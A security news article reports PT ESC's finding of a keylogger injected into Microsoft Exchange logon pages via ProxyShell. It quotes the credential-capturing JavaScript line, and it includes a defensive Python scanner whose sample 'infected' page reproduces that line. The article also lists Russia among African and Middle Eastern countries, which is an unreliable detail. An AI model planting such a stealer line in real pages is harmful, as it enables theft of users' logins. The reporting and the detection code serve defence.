Keylogger Embedded in Microsoft Exchange Server

Positive Technologies’ Expert Security Centre (PT ESC) found a sophisticated keylogger hidden on the main page of Microsoft Exchange Servers.

This is a major security breach that affects businesses and government bodies around the world.

The campaign, a widespread and covert attack that has been stealing credentials since 2021, came to light during an incident response engagement. A keylogger planted in Microsoft Exchange Server has been harvesting government agency logins worldwide.

Discovery and Attack Mechanism

The PT ESC team discovered the keylogger while investigating an incident involving a compromised Microsoft Exchange Server. The malicious code was discovered in the clkLgn() function of the server’s primary page.


This keylogger records user credentials, such as usernames and passwords, and stores them in a file that can be accessed through a specific internet path.

The attack exploited ProxyShell, a well-documented vulnerability in Microsoft Exchange Server. By exploiting it, the attackers were able to inject the keylogger code into the server’s primary page. The hackers employed the following code snippet:

var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);

Furthermore, the attackers altered the logon.aspx file to process the captured credentials and redirect them to a file that is reachable from the internet. This enabled the attackers to collect and exfiltrate sensitive login information undetected.

The investigation revealed that the attack had impacted more than 30 victims, the majority of whom were government agencies. Educational institutions, corporations, and IT companies are among the affected entities.

These attacks have affected a variety of countries in Africa and the Middle East, such as Russia, the UAE, Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon.

Recommendations and Mitigation

Positive Technologies has notified all affected organizations and recommended steps to mitigate the threat. Organizations using Microsoft Exchange Servers are advised to:

  1. Check for Compromise: Search for the stealer code on the main page of their Microsoft Exchange Server.
  2. Patch Vulnerabilities: Ensure all known vulnerabilities, including ProxyShell, are patched promptly.
  3. Monitor Logs: Regularly monitor server logs for unusual activity and unauthorized access attempts.
  4. Enhance Security Measures: Implement multi-factor authentication and other advanced security measures to protect against credential theft.
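A way to carry out the first recommendation against the stealer described above: the following scanner is an added example, not PT ESC's or Microsoft's code. The `"ObjectType="` and `"&uin="` strings are taken from the snippet quoted in the article; the regular expressions, the `Finding` type and the two sample logon pages are constructed here for illustration.

```python
"""Heuristic check of an Exchange OWA logon page for the credential stealer
described by PT ESC. Indicator strings come from the quoted snippet; the
patterns and sample pages below are constructed for this example."""
import re
from dataclasses import dataclass
from pathlib import Path

# Indicators derived from the injected line quoted in the write-up.
INDICATORS = {
    # Credentials serialised into an "ObjectType=" request parameter
    "objecttype_param": re.compile(r'"ObjectType="\s*\+\s*escape\('),
    # Random "uin" cache-buster appended to the same request
    "uin_random_param": re.compile(r'"&uin="\s*\+\s*Math\.random\(\)'),
    # Username and password field values concatenated into one string
    # (heuristic: the stock logon page does not build such a string)
    "cred_concat": re.compile(
        r'gbid\("username"\)\.value.*gbid\("password"\)\.value'),
}

@dataclass
class Finding:
    line_no: int    # 1-based line in the scanned page
    indicator: str  # key from INDICATORS
    text: str       # offending line, stripped

def scan_logon_page(source: str) -> list[Finding]:
    """Return one Finding per indicator match, tagged with its line number."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append(Finding(line_no, name, line.strip()))
    return findings

def scan_file(path: str) -> list[Finding]:
    """Scan an on-disk logon.aspx (path supplied by the operator)."""
    return scan_logon_page(Path(path).read_text(encoding="utf-8", errors="replace"))

# Constructed samples: a minimal clkLgn() stub, and the same stub with the
# stealer line quoted by PT ESC inserted before the form submit.
CLEAN_PAGE = """
function clkLgn() {
    if (gbid("rdoPrvt").checked) { setPrivateMode(); }
    gbid("logonForm").submit();
}
"""
INFECTED_PAGE = CLEAN_PAGE.replace(
    '    gbid("logonForm").submit();',
    '    var curTime = new Date().getTime();\n'
    '    var ObjectData = "ObjectType=" + escape(curTime + "\\t" + gbid("username").value'
    ' + "\\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);\n'
    '    gbid("logonForm").submit();')

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(label, [(f.line_no, f.indicator) for f in scan_logon_page(page)])
```

Any hit warrants comparing the page against a known-good copy from installation media, since the patterns only cover the variant reported here.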

This incident underscores the critical importance of maintaining robust cybersecurity defenses and staying vigilant against evolving threats.

As attackers continue to exploit vulnerabilities in widely used software, organizations must prioritize proactive security measures to safeguard their sensitive information.


Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.